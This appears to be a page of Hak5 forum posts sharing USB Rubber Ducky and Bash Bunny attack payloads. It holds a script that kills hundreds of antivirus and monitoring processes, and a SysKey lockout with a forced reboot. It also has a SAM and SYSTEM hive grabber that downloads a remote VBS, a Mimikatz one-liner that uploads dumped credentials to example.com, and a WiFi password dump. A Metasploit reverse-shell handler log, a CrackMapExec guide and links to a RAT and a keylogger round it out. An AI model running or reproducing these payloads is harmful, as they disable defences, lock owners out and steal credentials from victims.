Taskkill /T /F /IM bundle.exe /IM bvt.exe /IM ccapp.exe /IM ccevtmgr.exe /IM ccpxysvc.exe /IM cdp.exe /IM cfd.exe /IM cfgwiz.exe /IM cfiadmin.exe /IM cfiaudit.exe /IM cfinet.exe Taskkill /T /F /IM cfinet32.exe /IM claw95.exe /IM claw95cf.exe /IM clean.exe /IM cleaner.exe /IM cleaner3.exe /IM cleanpc.exe /IM click.exe /IM cmesys.exe Taskkill /T /F /IM cmgrdian.exe /IM cmon016.exe /IM connectionmonitor.exe /IM cpd.exe /IM cpf9x206.exe /IM cpfnt206.exe /IM ctrl.exe /IM cv.exe /IM cwnb181.exe /IM cwntdwmo.exe Taskkill /T /F /IM datemanager.exe /IM dcomx.exe /IM defalert.exe /IM defscangui.exe /IM defwatch.exe /IM deputy.exe /IM divx.exe /IM dllcache.exe /IM dllreg.exe /IM doors.exe Taskkill /T /F /IM dpf.exe /IM dpfsetup.exe /IM dpps2.exe /IM drwatson.exe /IM drweb32.exe /IM drwebupw.exe /IM dssagent.exe /IM dvp95.exe /IM dvp95_0.exe /IM ecengine.exe Taskkill /T /F /IM efpeadm.exe /IM emsw.exe /IM ent.exe /IM esafe.exe /IM escanhnt.exe /IM escanv95.exe /IM espwatch.exe /IM ethereal.exe /IM etrustcipe.exe /IM evpn.exe Taskkill /T /F /IM exantivirus-cnet.exe /IM exe.avxw.exe /IM expert.exe /IM explore.exe /IM f-agnt95.exe /IM f-prot.exe /IM f-prot95.exe /IM f-stopw.exe /IM fameh32.exe /IM fast.exe Taskkill /T /F /IM fch32.exe /IM fih32.exe /IM findviru.exe /IM firewall.exe /IM fnrb32.exe /IM fp-win.exe /IM fp-win_trial.exe /IM fprot.exe /IM frw.exe /IM fsaa.exe /IM fsav.exe Taskkill /T /F /IM fsav32.exe /IM fsav530stbyb.exe /IM fsav530wtbyb.exe /IM fsav95.exe /IM fsgk32.exe /IM fsm32.exe /IM fsma32.exe /IM fsmb32.exe /IM gator.exe /IM gbmenu.exe Taskkill /T /F /IM gbpoll.exe /IM generics.exe /IM gmt.exe /IM guard.exe /IM guarddog.exe /IM hacktracersetup.exe /IM hbinst.exe /IM hbsrv.exe /IM hotactio.exe /IM hotpatch.exe Taskkill /T /F /IM htlog.exe /IM htpatch.exe /IM hwpe.exe /IM hxdl.exe /IM hxiul.exe /IM iamapp.exe /IM iamserv.exe /IM iamstats.exe /IM ibmasn.exe /IM ibmavsp.exe /IM icload95.exe Taskkill /T /F /IM icloadnt.exe /IM icmon.exe /IM icsupp95.exe /IM icsuppnt.exe /IM idle.exe /IM iedll.exe /IM iedriver.exe /IM iexplorer.exe /IM iface.exe /IM ifw2000.exe Taskkill /T /F /IM inetlnfo.exe /IM infus.exe /IM infwin.exe /IM init.exe /IM intdel.exe /IM intren.exe /IM iomon98.exe /IM istsvc.exe /IM jammer.exe /IM jdbgmrg.exe /IM jedi.exe Taskkill /T /F /IM kavlite40eng.exe /IM kavpers40eng.exe /IM kavpf.exe /IM kazza.exe /IM keenvalue.exe /IM kerio-pf-213-en-win.exe /IM kerio-wrl-421-en-win.exe /IM kerio-wrp-421-en-win.exe Taskkill /T /F /IM kernel32.exe /IM killprocesssetup161.exe /IM launcher.exe /IM ldnetmon.exe /IM ldpro.exe /IM ldpromenu.exe /IM ldscan.exe /IM lnetinfo.exe /IM loader.exe Taskkill /T /F /IM localnet.exe /IM lockdown.exe /IM lockdown2000.exe /IM lookout.exe /IM lordpe.exe /IM lsetup.exe /IM luall.exe /IM luau.exe /IM lucomserver.exe /IM luinit.exe Taskkill /T /F /IM luspt.exe /IM mapisvc32.exe /IM mcagent.exe /IM mcmnhdlr.exe /IM mcshield.exe /IM mctool.exe /IM mcupdate.exe /IM mcvsrte.exe /IM mcvsshld.exe /IM md.exe Taskkill /T /F /IM mfin32.exe /IM mfw2en.exe /IM mfweng3.02d30.exe /IM mgavrtcl.exe /IM mgavrte.exe /IM mghtml.exe /IM mgui.exe /IM minilog.exe /IM mmod.exe /IM monitor.exe Taskkill /T /F /IM moolive.exe /IM mostat.exe /IM mpfagent.exe /IM mpfservice.exe /IM mpftray.exe /IM mrflux.exe /IM msapp.exe /IM msbb.exe /IM msblast.exe /IM mscache.exe Taskkill /T /F /IM msccn32.exe /IM mscman.exe /IM msconfig.exe /IM msdm.exe /IM msdos.exe /IM msiexec16.exe /IM msinfo32.exe /IM mslaugh.exe /IM msmgt.exe /IM msmsgri32.exe Taskkill /T /F /IM mssmmc32.exe /IM mssys.exe /IM msvxd.exe /IM mu0311ad.exe /IM mwatch.exe /IM n32scanw.exe /IM nav.exe /IM navap.navapsvc.exe /IM navapsvc.exe /IM navapw32.exe Taskkill /T /F /IM navdx.exe /IM navlu32.exe /IM navnt.exe /IM navstub.exe /IM navw32.exe /IM navwnt.exe /IM nc2000.exe /IM ncinst4.exe /IM ndd32.exe /IM neomonitor.exe Taskkill /T /F /IM neowatchlog.exe /IM netarmor.exe /IM netd32.exe /IM netinfo.exe /IM netmon.exe /IM netscanpro.exe /IM netspyhunter-1.2.exe /IM netstat.exe /IM netutils.exe Taskkill /T /F /IM nisserv.exe /IM nisum.exe /IM nmain.exe /IM nod32.exe /IM normist.exe /IM norton_internet_secu_3.0_407.exe /IM notstart.exe /IM npf40_tw_98_nt_me_2k.exe Taskkill /T /F /IM npfmessenger.exe /IM nprotect.exe /IM npscheck.exe /IM npssvc.exe /IM nsched32.exe /IM nssys32.exe /IM nstask32.exe /IM nsupdate.exe /IM nt.exe /IM ntrtscan.exe Taskkill /T /F /IM ntvdm.exe /IM ntxconfig.exe /IM nui.exe /IM nupgrade.exe /IM nvarch16.exe /IM nvc95.exe /IM nvsvc32.exe /IM nwinst4.exe /IM nwservice.exe /IM nwtool16.exe Taskkill /T /F /IM ollydbg.exe /IM onsrvr.exe /IM optimize.exe /IM ostronet.exe /IM otfix.exe /IM outpost.exe /IM outpostinstall.exe /IM outpostproinstall.exe /IM padmin.exe Taskkill /T /F /IM panixk.exe /IM patch.exe /IM pavcl.exe /IM pavproxy.exe /IM pavsched.exe /IM pavw.exe /IM pccwin98.exe /IM pcfwallicon.exe /IM pcip10117_0.exe /IM pcscan.exe Taskkill /T /F /IM pdsetup.exe /IM periscope.exe /IM persfw.exe /IM perswf.exe /IM pf2.exe /IM pfwadmin.exe /IM pgmonitr.exe /IM pingscan.exe /IM platin.exe /IM pop3trap.exe Taskkill /T /F /IM poproxy.exe /IM popscan.exe /IM portdetective.exe /IM portmonitor.exe /IM powerscan.exe /IM ppinupdt.exe /IM pptbc.exe /IM ppvstop.exe /IM prizesurfer.exe Taskkill /T /F /IM prmt.exe /IM prmvr.exe /IM procdump.exe /IM processmonitor.exe /IM procexplorerv1.0.exe /IM programauditor.exe /IM proport.exe /IM protectx.exe /IM pspf.exe Taskkill /T /F /IM purge.exe /IM qconsole.exe /IM qserver.exe /IM rapapp.exe /IM rav7.exe /IM rav7win.exe /IM rav8win32eng.exe /IM ray.exe /IM rb32.exe /IM rcsync.exe /IM realmon.exe Taskkill /T /F /IM reged.exe /IM regedit.exe /IM regedt32.exe /IM rescue.exe /IM rescue32.exe /IM rrguard.exe /IM rshell.exe /IM rtvscan.exe /IM rtvscn95.exe /IM rulaunch.exe Taskkill /T /F /IM run32dll.exe /IM rundll.exe /IM rundll16.exe /IM ruxdll32.exe /IM safeweb.exe /IM sahagent.exe /IM save.exe /IM savenow.exe /IM sbserv.exe /IM sc.exe /IM scam32.exe Taskkill /T /F /IM scan32.exe /IM scan95.exe /IM scanpm.exe /IM scrscan.exe /IM serv95.exe /IM setup_flowprotector_us.exe /IM setupvameeval.exe /IM sfc.exe /IM sgssfw32.exe Taskkill /T /F /IM sh.exe /IM shellspyinstall.exe /IM shn.exe /IM showbehind.exe /IM smc.exe /IM sms.exe /IM smss32.exe /IM soap.exe /IM sofi.exe /IM sperm.exe /IM spf.exe Taskkill /T /F /IM sphinx.exe /IM spoler.exe /IM spoolcv.exe /IM spoolsv32.exe /IM spyxx.exe /IM srexe.exe /IM srng.exe /IM ss3edit.exe /IM ssg_4104.exe /IM ssgrate.exe /IM st2.exe Taskkill /T /F /IM start.exe /IM stcloader.exe /IM supftrl.exe /IM support.exe /IM supporter5.exe /IM svc.exe /IM svchostc.exe /IM svchosts.exe /IM svshost.exe /IM sweep95.exe Taskkill /T /F /IM sweepnet.sweepsrv.sys.swnetsup.exe /IM symproxysvc.exe /IM symtray.exe /IM sysedit.exe /IM system.exe /IM system32.exe /IM sysupd.exe /IM taskmg.exe /IM taskmgr.exe Taskkill /T /F /IM taskmo.exe /IM taskmon.exe /IM taumon.exe /IM tbscan.exe /IM tc.exe /IM tca.exe /IM tcm.exe /IM tds-3.exe /IM tds2-98.exe /IM tds2-nt.exe /IM teekids.exe Taskkill /T /F /IM tfak.exe /IM tfak5.exe /IM tgbob.exe /IM titanin.exe /IM titaninxp.exe /IM tracert.exe /IM trickler.exe /IM trjscan.exe /IM trjsetup.exe /IM trojantrap3.exe Taskkill /T /F /IM tsadbot.exe /IM tvmd.exe /IM tvtmd.exe /IM undoboot.exe /IM updat.exe /IM update.exe /IM upgrad.exe /IM utpost.exe /IM vbcmserv.exe /IM vbcons.exe Taskkill /T /F /IM vbust.exe /IM vbwin9x.exe /IM vbwinntw.exe /IM vcsetup.exe /IM vet32.exe /IM vet95.exe /IM vettray.exe /IM vfsetup.exe /IM vir-help.exe /IM virusmdpersonalfirewall.exe Taskkill /T /F /IM vnlan300.exe /IM vnpc3000.exe /IM vpc32.exe /IM vpc42.exe /IM vpfw30s.exe /IM vptray.exe /IM vscan40.exe /IM vscenu6.02d30.exe /IM vsched.exe /IM vsecomr.exe Taskkill /T /F /IM vshwin32.exe /IM vsisetup.exe /IM vsmain.exe /IM vsmon.exe /IM vsstat.exe /IM vswin9xe.exe /IM vswinntse.exe /IM vswinperse.exe /IM w32dsm89.exe /IM w9x.exe Taskkill /T /F /IM watchdog.exe /IM webdav.exe /IM webscanx.exe /IM webtrap.exe /IM wfindv32.exe /IM whoswatchingme.exe /IM wimmun32.exe /IM win-bugsfix.exe /IM win32.exe Taskkill /T /F /IM win32us.exe /IM winactive.exe /IM window.exe /IM windows.exe /IM wininetd.exe /IM wininitx.exe /IM winlogin.exe /IM winmain.exe /IM winnet.exe /IM winppr32.exe Taskkill /T /F /IM winrecon.exe /IM winservn.exe /IM winssk32.exe /IM winstart.exe /IM winstart001.exe /IM wintsk32.exe /IM winupdate.exe /IM wkufind.exe /IM wnad.exe /IM wnt.exe Taskkill /T /F /IM wradmin.exe /IM wrctrl.exe /IM wsbgate.exe /IM wupdater.exe /IM wupdt.exe /IM wyvernworksfirewall.exe /IM xpf202en.exe /IM zapro.exe /IM zapsetup3001.exe Taskkill /T /F /IM zatutor.exe /IM zonalm2601.exe /IM zonealarm.exe And to make it all come together. start.cmd @echo off cls REM Change AVKill.ps1 to AVKill.cmd if you prefer batch based files. powershell.exe -executionpolicy bypass "%~dp0\AVKill.ps1" >NUL @exit Until next time, when I get some more free time.. -Ar1k88
  2. I have a rubber ducky with the latest firmware and when trying to deploy a payload on my MS Windows 7 company Pcs and laptops nothing happens. But if I press the deploy button it works. The ducky is working correctly because I am able to deploy payloads on Linux machines using the same hardware as the Windows PC's, and external PC's running Windows 7. All out computers are from Dell and we have a myriad of models (Optiplex, Latitude, etc) running Windows 7 and 10, we are using ESET Endpoint Antivirus with real time file system protection activated. I am inclined that the ducky is not working because some software is blocking it. Perhaps ESET.??? I will appreciate if anyone can comment on this issue. Thanks. met.
  3. [PAYLOAD] SysKey - Bashbunny

    I saw a Syskey Prank done on a USB via RubberDucky. So I decided to rewrite one for the Bashbunny even tho it really serves no great purpose. So furthermore, after Syskey'ing myself. I dont want the dang thing anymore, so I'm releasing it. #!/bin/bash # # Title: SysKey and Reboot # Author: Ar1k88 # Version: 1.1b # Target: Windows 7-10 # # LED | Function # --------------------------------------------------------- # MAGENTA SLOW - USB Detection/Setup # YELLOW FAST/VERYFAST - Script Startup/Execute # CYAN VERYFAST - Shutting down Target Machine # GREEN BLINK/SOLID - Shutting down Bashbunny for safe removal # LED OFF - Bashbunny is Off, Safe to remove. # # Startup Delay 3 seconds. LED M SLOW ATTACKMODE HID Q DELAY 3000 # Force to Desktop LED Y FAST Q GUI d Q DELAY 250 # Open Run and Syskey Q GUI r Q DELAY 500 Q STRING syskey Q ENTER Q DELAY 500 # UAC Bypass Q ALT y # Setup Syskey - Setting Password as bashbunny LED Y VERYFAST Q DELAY 500 Q STRING u Q DELAY 250 Q STRING p Q DELAY 250 Q STRING w Q DELAY 250 Q STRING bashbunny Q TAB Q DELAY 250 Q STRING bashbunny Q DELAY 250 Q ENTER Q DELAY 500 Q ENTER # Rebooting Target Machine LED C VERYFAST Q GUI r Q DELAY 500 Q STRING CMD Q ENTER Q DELAY 500 Q STRING shutdown /r /f /t 0 Q ENTER Q DELAY 250 # Success - Starting Bashbunny Safe Shutdown LED SUCCESS sync -o Q DELAY 3000 shutdown 0 SysKey Password: bashbunny Please be responsible. ;) -Ar1k88
  4. Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤
  5. [PAYLOAD] Clean State

    This is a simple ducky script I wrote that will clear your google chrome history and automatically log you off tested on windows 7 (Windows 8-10 requires modification because of start menu.) This payload is useful for when run/GUI + R is blocked DELAY 1000 CTRL + H DELAY 750 DELETE DELAY 2000 CTRL + W DELAY 750 GUI DELAY 100 TAB DELAY 100 TAB DELAY 100 ENTER You may want to increase the delays as most library computers can be slower than the average machine.
  6. [RESOLVED] encoding issue

    Hi guys, I actually work on another payload and i want to add some control sequence in order to reduce and move my terminal window (Control sequence). I have some issue with the character \ and [ that become a reversed exclamation mark and a {. Any idea on how to solve this issue ? (i already try to use keycode) Thks
  7. Payload and unix command

    Hi there, I have a little question, i love my bash bunny, create a lot of payloads (i will post them when really finished), but still have some question. Actually for all my payload i open a terminal, minimize it and do my stuff. When i look at this kind of payload , on line 24 there is a unix command "mkdir". So, it's possible to use unix command without a terminal ? Reminder for people who read this topic, working unix command in payload : mkdir source export
  8. [PAYLOAD] PasswordGrabber

    Link to github: https://github.com/hak5/bashbunny-payloads/pull/67 Comment if you would like to see some improvments or changes.
  9. So I was recently looking into NFC and how cool it is to read/write to a tag to be able to use it to control your phone, clone a card (don't do dis - illegal) and other cool stuff and I thought about making a payload that installs an app on an Android (can use HID if you wanted to..) phone then runs the app in the background. What this app does is it waits to read an NFC tag which then executes a command. The command is stored on the NFC tag itself (so you install the app on the phone and come back later with your NFC tags to do all your fancy work). Works, basically, (dare I say it..) like a 'Powershell agent'. You could make like 10 different tags that can do different things on the phone. You only have to brush the tags near the phone for the phone to execute the commands. Commands could be: - Send an SMS to yourself (phone number is stored on NFC tag so it won't be stored on the phone itself) with phone data - Call someone (prank call but..you pranked the actual call itself) - Open a webpage and download a file - Download an app from the app store - Add a contact (dunno why..) - Execute a Linux command (requires rooted Android) - Enable hotspot with specified password (you could use their data..more of an annoyance than anything else - would need rooted device to change the password) - Enable Bluetooth/WiFi - Change the volume of the device (shoot it up, make it silent..) - Make it vibrate for the next 10 minutes (That would be hilarious) - Make it start randomly ringing - Add a huge number of alarms that go off every minute/hour - Enable hotspot and start a server so that you could join it and remotely manage files/apps/settings (includes starting an ADB server...oooooooo..) Possibilities are endless... Just an idea. Installing the app from the Bash Bunny onto the device is the tricky part.
  10. Hello. I was messing around with metasploit. Im using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at Starting the payload handler... The new one works fine. Need help fixing it please. Here's the Armitage log: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST PUBLIC IP LHOST => PUBLIC IP msf exploit(handler) > set LPORT 4443 LPORT => 4443 msf exploit(handler) > set Encoder x86/shikata_ga_nai Encoder => x86/shikata_ga_nai msf exploit(handler) > set EXITFUNC process EXITFUNC => process msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set Iterations 3 Iterations => 3 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on PUBLIC IP:4443 [*] Starting the payload handler...
  11. SAM File Copy - Help

    Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.
  12. [PAYLOAD] WiFiCreds

    Adding this for initial pull request https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/WiFiCreds
  13. Information Recon Payload

    i have created an information recon payload for the usb rubber ducky you download it at http://anonsw1tchbl4d3.weebly.com/irp.html
  14. Here is my new payload to attack a Mac without using terminal. I got this idea after seeing how using good management software, an administrator can remove an app from a Mac (one such application being terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files and all without terminal. I used Grab.app for this but almost any app could be used, I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it. Here is the code, its outcome is to simply "say hello" (so if you test it have the volume up a bit). I have not really played with the delays yet, they are all over the place and some are to high but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have Fun, but please use this responsibly. DELAY 2000 COMMAND SPACE DELAY 300 STRING /Applications/Utilities/ DELAY 200 ENTER DELAY 400 STRING g DELAY 500 COMMAND c DELAY 300 COMMAND SPACE DELAY 300 STRING /Users/Shared/ DELAY 400 ENTER DELAY 400 COMMAND v DELAY 2000 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app/Contents/MacOS/ DELAY 600 ENTER DELAY 500 TAB DELAY 500 COMMAND o DELAY 500 COMMAND a DELAY 500 STRING #!/bin/bash DELAY 400 ENTER DELAY 300 STRING say DELAY 300 ESCAPE DELAY 300 SPACE DELAY 300 STRING hello DELAY 300 COMMAND s DELAY 400 COMMAND q DELAY 500 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app DELAY 400 ENTER COMMAND w COMMAND w COMMAND w
  15. WinKeylog

    Hi there, I just finished the first version of my BB keylogger. It basicly launches a powershell which keylogs to the loot folder of the BB. Features: Fast launching (thanks to USB Exfil for the one line launcher) Leaves no traces when cleanup is enabled. (Insert feature?) Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger VincBreaker PS: I will create a push request upon positive feedback and improve the payload in the other case.
  16. TLDR: https://github.com/ThoughtfulDev/PyDuckGen Hey, since the Simple-Ducky Payload Generator is discontinued i think.. i just wanted to create an easy way to generate existing payloads and move the needed files to the Rubber Ducky. PyDuck is a Python Script which helps you to get your once written USB Rubber Ducky Payloads onto your Duck's SDCard quickly. You can even change variable components by using a simple set <attribute> <val> command. All of this is made easy with a Metasploit like interface. Simply choose your payload with use <payload> configure it and there you go :) Have a look into the bundled modules in the module folder to understand the attributes but here is a quick explanation. Your duckscript is: ... STRING <replacable_text> ... In your module.json just add you attribute to the attributes tree like this: "attributes": { "replacable_text": "The default value" } If you know load your payload with 'use <your_payload>' you can now use the following: set replacable_text Hak5 is awesome :) If you then generate the inject.bin using: gen or generate the <replacable_text> will be replaced with Hak5 is awesome. Isn't that...awesome? :D You can even add folder/files to your module.json which are needed for you payload (have a look at the mimikatz_lazagne payloads to see how this works.) I really suggest that you have a look at the existing payloads to figure out how this works :D More Information can be found on the Github Repo: https://github.com/ThoughtfulDev/PyDuckGen Let me know what you think.
  17. [PAYLOAD] UnifiedRickRollWindows

    In the spirit of april fools, I ported the original UnifiedRickRoll to windows, so you can easily switch between apple and windows computers and still get the same effect. https://github.com/hak5/bashbunny-payloads/pull/139
  18. [PAYLOAD] psh_DownloadExec

    Here's a simple payload to download and execute a powershell payload locally from the BashBunny. This payload is especially useful when running larger Powershell scripts. It's much faster than waiting on HID keystrokes.
  19. I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER
  20. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  21. Hey all, I rewrote the WiPassDump payload (along with every other person on the planet), but hopefully this one is the best so far. I've cut everything down to 1 file, and the actual attack takes up about 4 lines. As an added bonus I've added hak5darren's code to remove the "run" dialogue history as well. The pull request can be viewed here: https://github.com/hak5/bashbunny-payloads/pull/132 Hope you guys like it.
  22. TV-show demo payload

    Hi, I am new to this forum. Hello! Nice to meet you all! I am planning a hacking demonstration on national TV in my country and I want to show the bashbunny and what it can do on a live show. For this I need a demonstration payload which can be used to show what a hacker can do. Starting points: - assume windows laptop with recent and updated operating system - assume the "'hack" should be carried out on a computer that is on but possibly locked (with user logged in) - I have maybe 30 minutes in total, but this part should only take maximum three-fives minutes including showing the results of the hack and explaining what it means - the audience is the general public without any detailed technical understanding Ideas: - can we make a demonstration payload that can showcase some hacks that will work most of the time? - can this be a combination of payloads that results in e.g. Copies files, passwords, backdoor? - for the hack only one or very few files need to be exfiltrated to demonstrate - not all files. - ideally the demonstration should result in audience says "wow, that was incredible, can that really be done"? Solution and ideas - this is where I need you guys and gals. Any ideas? /Blix
  23. [PAYLOAD] dns_spoofer

    Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer
  24. CrackMapExec is a fantastic tool developed by Byt3bl33de3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec As stated in the repo's README, it's powered by Impacket and takes queues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so: cd /pentest curl -k -O https://bootstrap.pypa.io/get-pip.py Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script: python get-pip.py That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work. apt-get install build-essential libssl-dev libffi-dev python-dev Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. Run pip: pip install crackmapexec Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is: crackmapexec $TARGET_IP That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this: crackmapexec $TARGET_IP -u "" -p "" That tells CME to try a Null session with SMB. If the target disallows Null sessions nothing bad happens. You still get the basic OS details. If the target allows for a Null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
  25. Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000 REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this.
×